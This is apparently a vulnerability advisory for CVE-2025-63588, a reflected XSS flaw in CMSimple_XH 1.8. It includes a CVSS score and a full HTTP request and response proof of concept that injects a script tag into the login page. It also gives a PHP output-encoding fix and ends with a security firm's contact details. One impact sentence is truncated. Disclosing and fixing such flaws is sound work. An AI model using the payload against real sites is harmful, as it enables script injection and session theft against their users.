
Prueba de concepto detallada para CVE-2025-63588, una vulnerabilidad de XSS reflejado en CMSimple_XH 1.8, con puntuación CVSS, análisis de impacto y un ejemplo de remediación de código seguro.
CVSS v3.1 Estimado: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Medio)
CVE Asignado: CVE-2025-63588
Productos: CMSimple_XH - 1.8
Vendor: CMSimple_XH - https://www.cmsimple-xh.org/
Existe una vulnerabilidad de Cross-Site Scripting (XSS) reflejado en el código de análisis del enrutador frontal de CMSimple_XH que maneja entradas dinámicas relacionadas con el inicio de sesión. La aplicación refleja datos controlados por el atacante tomados de la URI de la solicitud directamente en el HTML generado (por ejemplo, en atributos action de formularios y en hrefs de anclas) sin una codificación de salida adecuada. Un atacante puede crear una URL que, al ser visitada por una víctima, provoque la ejecución de JavaScript arbitrario en el navegador de la víctima en el contexto del sitio vulnerable.
Esto es un XSS reflejado (no persistente); la explotación requiere que una víctima siga un enlace manipulado. El proveedor ha sido informado y el problema ha sido documentado y se le ha asignado el CVE anterior.
HttpOnly, los tokens de sesión pueden ser robados.La vulnerabilidad se origina en el código del enrutador frontal / index.php (o controlador frontal equivalente) que analiza segmentos de ruta dinámicos y los asigna a variables de plantilla/página. Fragmentos de ruta sin procesar (el fragmento de estilo ?Templates... utilizado por el enrutador de CMSimple_XH) se pasan a las plantillas de página y se inyectan en atributos HTML sin una codificación o desinfección adecuada de atributos HTML, lo que permite que las etiquetas <script> inyectadas u otras cargas útiles se representen textualmente. Problemas similares de XSS reflejado se han publicado para otros componentes web y son comúnmente causados por una codificación de salida incorrecta de entradas no confiables.
Esta PoC demuestra el reflejo de la entrada proporcionada por el atacante en el HTML devuelto que se ejecutará en el navegador de una víctima.
Solicitud:
POST /cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9 HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates&login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 45
login=true&keycut=z9U%21q2k%21F0&submit=Login
Respuesta:
HTTP/1.1 200 OK
Host: 192.168.98.129:8080
Date: Mon, 06 Oct 2025 02:50:49 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Set-Cookie: XH_2f636d73696d706c6578682f=v7hkld81biddtmoua1maptd18a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>English Site Title – Login</title>
<meta name="robots" content="noindex">
<meta name="keywords" content="Enter list of comma separated keywords here">
<meta name="description" content="Enter website description for search engine results here">
<link rel="stylesheet" href="./assets/css/xhstyles.css" type="text/css">
<link rel="stylesheet" href="./templates/fhs-simple-2019/stylesheet.css" type="text/css">
<meta name="robots" content="noindex">
</head>
<body class="xh_login" onload="document.forms['login'].elements['keycut'].focus();">
<div class="xh_login"><h1>Login</h1><p class="xh_fail">You have entered a wrong password!</p><p><b>Site administration. Please enter password.</b></p><form id="login" name="login" action="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9" method="post"><input type="hidden" name="login" value="true"><input type="password" name="keycut" id="passwd" value=""> <input type="submit" name="submit" id="submit" value="Login"></form><p><a href="https://github.com/cybercrewinc/cve-2025-63588/blob/main/cmsimplexh?Templatesx6l81"><script>alert(1)</script>y92q9">Back</a></p> </div></body>
</html>
Cuando el navegador de una víctima renderiza esta página, el <script>alert(1)</script> inyectado se ejecuta.

$action_url = '/cmsimplexh/?' . rawurlencode($template_token);
echo '<form action="' . htmlspecialchars($action_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '" method="post">';
ご質問・ご相談などございましたら、お気軽にご連絡ください。

📞 Tel: 03-6853-5823
📧 Mail:[email protected]
| 項目 | 内容 |
|---|---|
| 会社名 | 株式会社CyberCrew |
| 所在地 | 東京都千代田区外神田1-18-13 秋葉原ダイビル6階 |
組織の脆弱性を多角的に分析し、最適な改善策を提案します。
標的型・シナリオ型・LLMペンテスト まで対応。
機密情報の流出を早期に検知し、迅速に対応。
実践的な攻撃シナリオに基づく防御力評価を実施。
開発初期段階からセキュリティを考慮した設計を支援します。
🌐 公式サイト:https://www.cybercrew.co.jp
🕒 CyberCrew — Your Trusted Security Partner.